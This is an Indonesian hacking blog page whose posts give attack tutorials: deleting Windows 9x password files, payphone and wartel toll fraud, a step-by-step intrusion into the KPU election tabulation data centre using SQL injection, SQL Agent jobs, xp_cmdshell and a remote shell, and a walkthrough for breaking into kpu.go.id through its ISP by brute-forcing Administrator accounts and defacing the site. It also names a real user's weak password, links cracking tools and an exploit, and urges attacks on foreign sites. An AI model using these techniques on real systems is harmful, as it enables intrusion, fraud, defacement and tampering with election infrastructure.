TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
    Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

    Trik Mereset Password Windows 9x

    Password pada windows 9x sebenarnya sangat rentan dan tidak di disain untuk menjaga keamanan usernya. System operasi ini sebenarnya hanyalah untuk penggunaan personal atau yang dinamakan home user.

    Trik berikut bisa anda gunakan untuk mengganti password ataupun mematikan password pada system operasi windows 9x. Sebenarnya password pada 9x tidak terlalu berguna, misalkan pada saat di minta memasukkan password toh kita bisa menekan escape dan segalanya selesai. Hanya saja jika tekan escape,maka otomatis fasilitas jaringan tidak akan di jalankan. Gimana jika ada password yang ingin kita ganti ? setiap kita memasukkan nama dan password pada 9x, maka akan diciptakan file dengan format namalogin.pwl. Anda tinggal cari file ini kemudian hapus dan account itu anda tinggal create ulang.

    Dengan cara ini pula anda bisa mengetahui ada account apa-apa saja yang terdapat pada windows 9x anda. Semoga sedikit trik ini berguna buat kita semua. Salam hacker  ptk

    Anonymous

    Berikan Pendapat Anda Untuk Artikel Ini

    Tip N Trik Telephon Gratis Musso

    Sebelumnya maaf jika artikel ini merugikan banyak pihak. Begitu banyak trik untuk mendapatkan sebuah keCERDIKAN dalam berkomunikasi, apalagi atas nama komunikasi secara GRATIS. ya kan....

    Dalam hal ini saya tidak akan banyak basa-basi lagi
     Trik telphon gratis Lokal (dalam kota)Fasilitas dan cara yang digunakan:
    1. Telphone umum koin yang masih hidup
    2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya" 3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal) 4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda. Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :

    1. TERLALU BANYAK NOMOR YANG KEMBAR 
    2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll 
    3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG 4. TELKOM SEDANG KENA TROUBLE :)) II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
    Fasilitas dan cara yang digunakan: 
    1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan) 
    2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota) 
    3. Bicaralah sepuas hati dan sebengkak bibir anda 
    4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI: 
    TRIK 1.
    SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA misal: tujuan 021888555000 -> bila telah selesai ketikan
    021888555000 lagi
    JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

    TRIK 2.  

    SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH
    NOMOR TUJUAN AKHIR
    misal: tujuan 021888555000 -> bila telah selesai ketikan
    031545552222 (BEDA NOMOR TUJUAN)
    JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

    CATATAN: Hati-hati dalam melakukan aksi ini karena sangat  merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))

    Segini dulu deh trik ini.. Kapan² kita buat lagi trik baru  yang lebih menghebohkan :)) SALAM MANIS BUAT SEMUA KAWAN² DI DUNIA MAYA #aikmel #e-c-h-o  #postgres #hackercrew (karena aku hanya bagian dari kalian)

    Teknik Menyusup Ke TNP Center KPU

    Server data center TNP KPU yang bernama SITUNGSRV  dilindungi dengan sangat ketat oleh firewall, diawasi olehcatatan log, dan dimonitor oleh detektor penyusup (IDS).Lantas bagaimana cara menyusupnya?

    Di sini saya akan mengemukakan salah satu cara untuk menyusup ke data center TNP KPU. Sebelumnya saya akan sedikit menjelaskan mengenai web server,SQL server, dan data center TNP KPU. Pada saat kita membuka situsweb http://tnp.kpu.go.id/Tabulasi/ maka kita akanterkoneksi ke server bernama KPUDCRPT02 yang menjadi IIS web servernya. Kemudian KPUDCRPT02 mengambil data dari KPUDCSQL02 yang menjadi SQL servernya. Database di KPUDCSQL02 ini diupdate secara rutin dari data center SITUNGSRV. Dengan menggunakan perintah SQL (pada tools yang telah diberikan sebelumnya) kita sudah dapat mengakses database di SITUNGSRV. Misalnya:  Untuk melihat list table: SELECT [name] FROM situngsrv.situng.dbo.sysobjects WHERE  [type]='U' or [type]='S'

    Untuk melihat list user:
    SELECT [name], [hasdbaccess], [islogin], [isntname],
    [isntgroup], [isntuser], [issqluser], issqlrole FROM
    situngsrv.situng.dbo.sysusers

    Namun cara ini sangat terbatas, karena kita masuk dengan  menggunakan login guest. Kita perlu login lain yang lebih  powerfull. Di sini kita dapat memanfaatkan kelemahan password reportmaker01 yang dengan mudah bisa kita tebak. Misalnya kita telah menemukan password reportmaker01 sebagai reportmaker. Kita dapat mencobanya memasukkan perintah berikut:

    SELECT uid FROM
    OPENROWSET('SQLOLEDB','SITUNGSRV';'reportmaker01';'reportmaker','SELECT
    user_name() as uid')

    Sekarang kita perlu menaikkan privilege-nya menjadi admin dengan memberikan SQL Injection yang memanfaatkan SQL Agent sebagai eksekutornya. Penggunaannya adalah sebagai berikut: SELECT uid FROMOPENROWSET('SQLOLEDB','SITUNGSRV';'reportmaker01';'reportmaker','SELECT user_name() as uid'; Sisipan SQL Injection)

    Sisipan SQL Injection yang kita berikan dapat berupa:
    USE msdb; EXEC sp_add_job
    @job_name='HealthCU',@enabled=1,@description='Weekly maintenance',@delete_level=1)USE msdb; EXEC sp_add_jobstep
    @job_name='HealthCU',@step_name='Tahap01',@subsystem='TSQL',@command='execmaster..xp_execresultset N''select ''''EXECsp_addrolemember
    ''''''''db_accessadmin'''''''',''''''''reportmaker01'''''''''''''',N''situng''';)USE msdb; EXEC sp_add_jobserver
    @job_name='HealthCU',@server_name='SITUNGSRV')
    USE msdb; EXEC sp_start_job @job_name='HealthCU')


    Maka login reportmaker01 sudah memiliki privilege db_accessadmin. Cara yang sama dapat juga digunakan untuk menaikkan priviledge menjadi sysadmin sehingga kita dapat mengeksekusi xp_cmdshell.Dengan xp_cmdshell kita bisa membuat sebuah file executable sebagai remote-shell yang dapat membuat SITUNGSRV berkomunikasi dengan KPUDCSQL02. 

    Bagaimana cara berkomunikasinya? Bukankah semua port sudah ditutup oleh firewall?
    Port 1143 tidak diblok. Namun port ini sudah digunakan oleh SQL Server dan kita tidak dapat menggunakannya lagi. Kita perlu membuat SQL server di SITUNGSRV untuk mati sejenak sehingga kita bisa menggunakan portnya. Caranya adalah dengan mengeset automatically start menjadi manually start, dan
    membuat SQL servernya crash.

    Cara untuk membuat SQL server menjadi manually start dan crash silakan lihat script pada
    http://tnpkpu.europe.webmatrixhosting.net/tnpdos.htm
    Pada saat server ini crash, maka operator akan menelpon administrator. Kemudian administrator akan menginstruksikan operator untuk me-restart server. Namun SQL server tidak akan otomatis jalan, tetapi remote-shell kita yang akan tereksekusi. 

    Selama menunggu administrator datang ke lokasi untuk men-start SQL server, kita dapat menikmati akses remote-shell pada SITUNGSRV, data center TNP KPU.Saat ini seluruh server yang terkoneksi ke jaringan sudah dimatikan termasuk SITUNGSRV, KPUDCSQLxx, KPUDCRPTxx dan digantikan oleh server bernama TNP. Dimohon untuk tidak mengklik button Kirim DoS pada http://tnpkpu.europe.webmatrixhosting.net/tnpdos.htm karena
    akan membuat SQL server di server TNP crash dan manually start sehingga artikel yang sebelumnya menjadi tidak dapat dicobakan.

    Berikan Pendapat Anda Untuk Artikel Ini

    Teknik Hacking Situs KPU Dari Berbagai Macam Sisi

    Hacking adalah sebuah seni dimana batasannya hanyalah kreativitas serta pengetahuan Anda. Hacking ke KPU-pun bisa dilakukan dengan banyak cara.

    Teknik Hacking Situs KPU Dari Berbagai Macam Sisi Oleh : Bokeph MemendeZ Menyingkapi banyaknya pertanyaan dari kaum hacker di  Indonesia, mengenani seputar penjebolan pusat tabulasi KPU – http://www.kpu.go.id, saya ingin berbagi sedikit mengenai teknik yang lain untuk melakukan attack ke situs kpu.go.id atau situs lainnya!.

    Dani “Xnuxer” Firmansyah mengunakan metode SQL Injection, yang beberapa waktu yang lalu sempat dibahas oleh S’to/Jasakom dalam bukunya. Masih banyak teknik lain yang dapat digunakan untuk melakukan attack ke situs-situs di Internet. Berikut ini saya Bokeph MemendeZ dari HackerSFreakz, ingin membongkar habis-habisan seputar hacking KPU dari berbagai macam sisi, selain dari sisi SQL Injection. Seluruh informasi semata-mata yang terpaparkan dalam artikel berbentuk tutorial ini semata-mata untuk ilmu pengetahuan dan teknologi bukan untuk tindakan pidana / kejahatan. “Anda yang membaca, Anda yang mencoba, Anda yang menentukan” ... Indonesia “idol”
    Hacker!

    Langsung saja menjawab pertanyaan ribuan orang, bagaimana cara hacking web khususnya www.kpu.go.id, tentunya semua orang ingin mengetahuinya dan mencobanya serta menjadi populer. Bukan begitu? Langsung saja Anda baca tulisan ringkas, padat, berisi, berbobot, dan inovatif berikut ini.


    Beberapa langkah melakukan hacking website www.kpu.go.id :

    1. Anda harus mengetahui alamat web KPU terlebih dahulu, yakni www.kpu.go.id à TARGET! It’s simple man...

    2. Berapa IP dynamic dari web kpu.go.id, cara melihatnya, anda dapat masuk ke lingkungan ms-dos dengan cmd.exe / command.com dengan mengetikan ping (Seperti pada Gambar I) – “ping www.kpu.go.id”. Terlihat IP KPU: 203.130.201.130 à TARGET

    3. Dimana web KPU ini berada, apakah indonesia/amerika/india/dll serta provider apa yang digunakan? Anda dapat masuk kembali pada lingkungan ms-dos dengan mengetikan nslookup (Seperti pada Gambar I) – nslookup www.kpu.go.id. Rupanya KPU mengunakan provider indosat.net.id untuk hosting webnya.

    4. Langkah selanjutnya setelah dapat mendapatkan info : www.kpu.go.id / 203.130.201.130 / Host Provider : Indosat.net.id Anda harus mengetahui sistim operasi apa yang digunakan oleh kpu.go.id serta indosat.net.id, Anda dapat melakukan mengecek di http://www.netcraft.com

    OS, Web Server and Hosting History for www.kpu.go.id
    http://www.kpu.go.id was running Apache on FreeBSD
    when last queried at 13-Sep-2004 10:00:25 GMT -
    refresh now FA
    OS ServerLast changedIP addressNetblock Owner FreeBSD Apache/2.0.48 (Unix) PHP/4.3.4 2-Apr-2004 

    203.130.201.130 PT TELEKOMUNIKASI INDONESIA
    Linux Apache/1.3.27 (Unix) (Red-Hat/Linux)
    mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2
    mod_ssl/2.8.12 OpenSSL/0.9.6b 31-Jul-2003 

    203.130.196.212 PT TELEKOMUNIKASI INDONESIA
    Linux Apache/1.3.19 (Unix) (Red-Hat/Linux)
    mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2
    mod_ssl/2.8.1 OpenSSL/0.9.6 9-Jan-2003

    203.130.196.102 PT TELEKOMUNIKASI INDONESIA
    Linux unknown 8-Jan-2003 203.130.196.102 PT
    TELEKOMUNIKASI INDONESIA
    Linux Apache/1.3.19 (Unix) (Red-Hat/Linux)
    mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2
    mod_ssl/2.8.1 OpenSSL/0.9.6 26-Sep-2002 

    203.130.196.102 PT TELEKOMUNIKASI INDONESIA
    Linux unknown 25-Sep-2002 203.130.196.102 PT
    TELEKOMUNIKASI INDONESIA
    Linux Apache/1.3.19 (Unix) (Red-Hat/Linux)
    mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2
    mod_ssl/2.8.1 OpenSSL/0.9.6 29-Jul-2002 

    203.130.196.102 PT TELEKOMUNIKASI INDONESIA
    Linux Apache/1.3.14 (Unix) mod_perl/1.24 PHP/4.0.6
    FrontPage/4.0.4.3 mod_ssl/2.7.1 OpenSSL/0.9.6 

    30-Apr-2002 203.130.196.102 PT TELEKOMUNIKASI
    INDONESIA
    Linux Apache/1.3.20 (Unix) mod_ssl/2.8.4
    OpenSSL/0.9.6b PHP/4.0.6 3-Oct-2001 202.159.35.90

    Linux Apache/1.3.20 (Unix) mod_fastcgi/2.2.10
    mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6 1-Oct-2001
    202.159.35.90

    OS, Web Server and Hosting History for www.indosat.net.id
    http://www.indosat.net.id was running unknown on Windows 2000 when last queried at 6-Sep-2004
    08:25:40 GMT - refresh now FAQ

    OS ServerLast changedIP addressNetblock OwnerWindows 2000 unknown 6-Sep-2004 202.155.27.132
    International Transmission Center, Indonesia Windows 2000 Microsoft-IIS/5.0 19-May-2004
    202.155.27.132 International Transmission Center, Indonesia
    NT4/Windows 98 Microsoft-IIS/4.0 12-Dec-2003
    202.155.15.26 INDOSATnet unknown Microsoft-IIS/4.0 11-Dec-2003
    202.155.15.26 INDOSATnet NT4/Windows 98 Microsoft-IIS/4.0 24-Sep-2002
    202.155.15.26 INDOSATnet unknown Microsoft-IIS/4.0 22-Sep-2002
    202.155.15.26 INDOSATnet NT4/Windows 98 Microsoft-IIS/4.0 3-Nov-2000
    202.155.15.26 Indosat Internet Service Provider


    5. Kita ketahui bahwa web www.kpu.go.id mengunakan OS : Apache
    on FreeBSD. Apache/2.0.48 (Unix) PHP/4.3.4 sedangkan
    www.Indosat.net.id mengunakan Windows 2000/NT on
    Microsoft-IIS/5.0/4.0

    6. Pelajari kelemahan-lemahan yang ada pada Apache / FreeBSD
    (Unix) serta PHP/4.3.4 untuk direct hacking langsung ke
    website kpu atau pelajari kelemahan-kelemahan dari IIS 4.0/5.0
    untuk hacking account kpu di indosat.

    Hacking www.kpu.go.id lewat www.indosat.net.idSetelah tim kami menganalisa selama beberapa pekan ini, akhir kami mendapatkan kelemahan-kelemahan pada web server provider yang digunakan oleh kpu sebagai tempat penyimpanan hosting mereka, yakni :

    1. Web Server IIS sendiri mempunyai kelemahan pada buffer jika terdapat permintaan dengan menggunakan 3000+ karakter pada .htr file. Dengan perintah ini memungkinkan remote user untuk mengeksesuki perintah2 untuk menguasai komputer target. Mustinya .Htr file tidak dimasukkan sebagai ektensi frontpage.

    2. Meskipun IUSR_HOST-INDOSAT & IWAM_HOST-INDOSAT tidakmempunyai hak untuk melakukan ‘Open Office’ tetapi hal ini merupakan sebuah celah untuk user dapat melakukan rpc ke /_vti_bin/shtml.dll untuk mendapatkan login anonymous dari internet account, karena IUSR_HOST-INDOSAT & IWAM_HOST-INDOSAT telah terbuka, meskipun vacum.

    3. Hak akses dari web indosat http://202.155.0.10/cgi-bin me-mungkinan direktori browsing dilakukan sehingga ada kecenderungan remote user melakukan browsing dan mencari kelemahan lainnya. Meskipun yang dapat mengakses hanya orang-orang yang subscribe ke hosting indosat itu sendiri.

    4. Pada direktory /_vti_bin/ ditemukan Fpcount.exe. Program ini bermasalah pada NT pada buffer merupakan suatu celah dimana IIS Hole dan dapat diakses dengan mudahnya.

    5. HelpAssistant & SUPPORT_388945a0 terbuka oleh si Admin. Meskipun hanya team Microsoft saja yang dapat mengaksesnya karena private password untuk support product mereka, tapi hal ini merupakan ancaman untuk si web server itu sendiri.

    Langsung Hacking KPU lewat bugs indosat.net.id
    1. Lakukan null koneksi (null connection)
    2. Lakukan flood byte ke www.indosat.net.id / IP 202.155.0.10
    3. Lakukan flood file ke www.indosat.net.id / IP 202.155.0.10
    Setelah anda melakukan ketiga langkah diatas, akhirnya Anda dapat melakukan ‘net view’ dengan mengunakan kelemahan mac address, seperti yang terlihat pada gambar. Oops.. Rupanya orang-orang indosat suka juga dengan GAMES ya...? Sekarang Anda dapat melihat sharing Direktori mereka! Begitu cerobohnya mereka tidak memikirkan 5 hal yang telah dibahas diatas. Dengan melihat share folder, anda dapat mengunakan IPC$, C$, ADMIN$, dsbnya semuanya dapat anda lihat, akan tetapi bagaimana dengan user dan password ? Menebak password ? Terlalu lama dan belum tentu berhasil!! 2 Cara ampuh yang dapat anda gunakan, yakni:

    1. Gunakan program NAT (gratis untuk versi non-GUI) atau versi komersialnya $19 yakni NetTools. Dengan memanfaatkan netbios/mac-addr dari null connection anda dapat melakukan cracking user dari kamus yang telah anda siapkan (download di internet – gratis!)

    NAT akan berjalan sampai kamus password anda habis, ada beberapa username dan biasanya banyak username yang ceroboh, dalam kasus ini kami mendapatkan username ceroboh dari RAHMAT yakni password ‘123456’ status Administrator, disini anda dapar mengunakan program GetAdmin untuk membuat user baru + password atau untuk merubah password Admin. Gunakan Remote Desktop Connection anda langsung Anda remote computer target.

    Masuk dengan mengunakan user : RAHMAT password : 123456, dan apa yang Anda lihat sebuah tampilan Windows 2000 Server, waw...w semua username/password isp ada disana, termasuk hosting KPU anda dapat menemukan pada direktori sub. inetpub mereka. Cari default.html / index.html atau .asp / .php dan rubah dengan tulisan “Defaced by Bokeph MemendeZ / ”. Jangan lupa backup file index mereka, jangan menjadi perusak. Dan buku web browser ketik web www.kpu.go.id, dengan tampilan simple “Bokeph MemendeZ was back & here in your System Project / HackerSFreakz”/

    2. Gunakan Program NETBRUFO, Program ini saya dapatkan dari seorang teman, yang dulunya pernah heboh dalam dunia hacking di Indonesia serta pemimpin group hacking di Indonesia yang di kenal sebagai : The Computer Underground, yakni Mr. Andry Christian, saat ini beliau merupakan peneliti & pakar jaringan komunikasi khususnya dalam scope keamanan jaringan komunikasi yang tergabung dalam Sekurindo. Program simple yang diciptakan seperti layaknya program NAT, perbedaannya, pada NAT kita harus memiliki kamus password, tetapi pada NETBRUFO, kamus file (dict.txt) bersifat optional karena memiliki menu Brute Force, yang pengoperasiannya disesuaikan dengan encryption yang ada pada SAM Windows System serta metode-metode enkripsi yang lainnya. Hanya dalam waktu kurang lebih 30 menit (untuk password normal a-z & 0-9 dengan panjang 6 karakter). password administrator telah kami dapatkan dan kami dapat masuk melalui IPC$, C$, ADMIN$, serta share folder lainnya atau dengan RDC (Remote
    Desktop Connection), atau FTP, karena ftp dibuka dengan userdan password yang dengan login Windows 2000 mereka.

    3. Anda dapat mengunakan cara yang lain untuk melakukan tracing password over Internet. Software-softwarenya telah banyak beredar di Internet, biasanya software yang dapat trace dengan mengunakan SAM sangat jalan, meskipun itu ada, tetapi kita harus investasi. Coba buka-buka kembali majalah NeoTek, kalau tidak salah pernah dipaparkan program2 networking scanner untuk tracing password. Kalau tidak salah, Mr. Andry Christian pernah memaparkan software buatannya di PC-Plus, entah versi berapa? Selama inisaya hanya mengunakan software NETBRUFO dan WEBTRACE dari King Jones –Australia, karena software tersebut sangat mudah dan password yang dapat dicrack akurat pula. Barang kali URLnya masih ada, coba cek di http://www.sampah.org/netbrufo.zip dan http://www.sampah.org/webtrace.zip

    Contoh Program NETBRUFO untuk Hacking Via BruteForce & Kamus
    Contoh Program WEBTRACE untuk Hacking Via BruteForce & Kamus

    Hacking www.kpu.go.id lewat bugs *nix (Apache/BSD)

    Kini tiba saatnya hacking lewat bugs/hole/lobang dari *nix,  sering-sering surfing lihat informasi seputar kemanan di  Internet, sitenya sangat banyak sekali, anda bisa mencarinya  di google (tutorial juga tersedia). Di Jasakom telah banyak tutorial hacking *nix, teknik dan langkah-langkah tidak perlu diuraikan lagi, yang perlu hanya exploitsnya, bukan? Kami sudah test exploit root-attack.c (0day) di labs MicroStar Security Care, Kelapa Gading, dan hasilnya sangat memuaskan. Dengan mudah, kami mendapatkan akses admin, luar biasa!! Stop!! Jangan hanya compile pake gcc lalu jalankan masukin ip lihat config, dsbnya, tapi coba pelajari langkah-langkah mereka itu yang terpenting. Untuk bugs ini, kami sudah memberitahukan kepada Tim IT KPU.GO.ID untuk menambalnyasebelum artikel ini dikeluarkan. Jadi kami minta maaf, karena kami hanya membongkar yang sudah diperbaiki bukan merusak!! Silahkan anda copy script exploit
    berikut ini, dan jalankan pada mesin *nix, coba situs-situs yang memiliki kelemahan Apache/BSD yang lainnya, biasanya situs-situs bertitik *.il *.nr *.kr masih lemah dan payah sistim kemanannya, untuk latihan silahkan hajar situs-situs tersebut.

    Download r00t-attack.c

    Kesimpulan
    Seluruh isi yang dapat dalam tutorial ini bersifat ‘free’, bebas diketahui oleh siapa saja, tanpa mengurangi rasa
    contribusi, kami memberikan kebebasan untuk dapat membaca, menyimpan, mempraktekan seluruh isi yang tertera pada tutorial ini, bukan untuk menjatuhkan pihak-pihak terkait atau mengkeruhkan keamanan web tetapi untuk membuat mereka semakin mengerti arti keamanan di Indonesia. Adalah menjadi tanggungan para pembaca seluruh isi dari tutorial ini, penulis tidak bertanggung jawab atas apapun juga mengenai isi baik seluruh maupun sepenggal dari tutorial ini. Pergunakanlah IPTEK untuk tujuan memajukan IT di Indonesia. Kami mengucapkan terima kasih kepada orang-orang terkait yang ada didalam artikel ini, baik perseorangan mapun organisasi tertentu. Maju terus sekuriti di Indonesia, Viva HackerSFreakz!!!

    · World Greetingz
    o Coderz.net yeah.. it’s simple folk!

    situs hacker yang ikut bermasalah

    Saya bukanlah hacker atau cracker hanyalah lamerz dan newbies dan heran dengan mereka yg mengaku hacker, dan selalu menDEFACE web2 akan tetapi ternyata web mereka juga bermasalah.

    Di channel tempat saya nongkrong, ada seorang yg mempromosikan webnya, setelah kurang lebih seminggu web tersebut di tutup sementara oleh sang ADMIN nya, setelah saya memberikan url seperti ini kepadanya

    http://superspy.biz/html/javascript/openwindow.php


    catatan : saya salut dengan admin dari superspy.biz, setelah  hole atau bug tersebut diketahui, dia berani menutup webnya  untuk sementara waktu.mungkin yg lebih berhak memberikan penjelasan tentang bug  tersebut "om Admin" jasakom, saya hanyalah newbie dan lamerzz.  Situs security dari indonesia yg sampai saat tulisan ini  diturunkan belum menutup bug atau hole tersebut :

    http://neoteker.or.id/javascript/openwindow.php?hlpfile=x

    MERDEKAaaAAAaaaAAaaAA



    Teriring salam untuk anak2 #cc-home #ccard #card2link spesial  : redcumi, vuem, hantugaul,Om TYO, dan
    semuanya jayalah selalu kalian.

    Schipotez
    Berikan Pendapat Anda Untuk Artikel Ini

    Seni Internet, Googlingg

    Tidak tahu apakah penggunaan google ini sudah bisa disebut seni atau bukan dan mudah mudahan juga istilah seni internet tidak dipatenkan sehingga saya tidak disebut plagiat dan harus membayar fee J . Tulisan ini dibuat untuk berbagi pengalaman mudah-mudahan bermanfaat dan semoga juga tidak membosankan serta tidak mengesalkan.

    Satu keumuman yang dapat dicermati ketika kita membaca tulisan-tulisan yang ditampilkan di Jasakom (mungkin juga di situs-situs lain yang berkaitan dengan tema-tema h4x0r) adalah penulisnya menggunakan google sebagai mesin pencarinya. Banyak ungkapan menarik yang dituliskan untuk menunjukkan kedekatan para penulis ini dengan google. Di bawah ini diberikan contoh beberapa ungkapan tersebut yang diambil dari
    tulisan di Jasakom.

    “ ... Paman Google ( Search Engine Favorit ku ) “
    “... apa itu VBS? baca google yah ...”
    “ ... oke langsung saja buka www.google.com cari aja yang ada hubungannya dengan php nuke ...”
    “...mari cari target buka http://www.google.co.il/ ...”
    “ ... Buka browser anda ke alamat: www.google.com lalu ketikkan keyword ...”
    “... banyak banget ya target yang tampil di jendela si google...”
    “...nah seperti biasa....GOOGLING!!! hehehe ...”

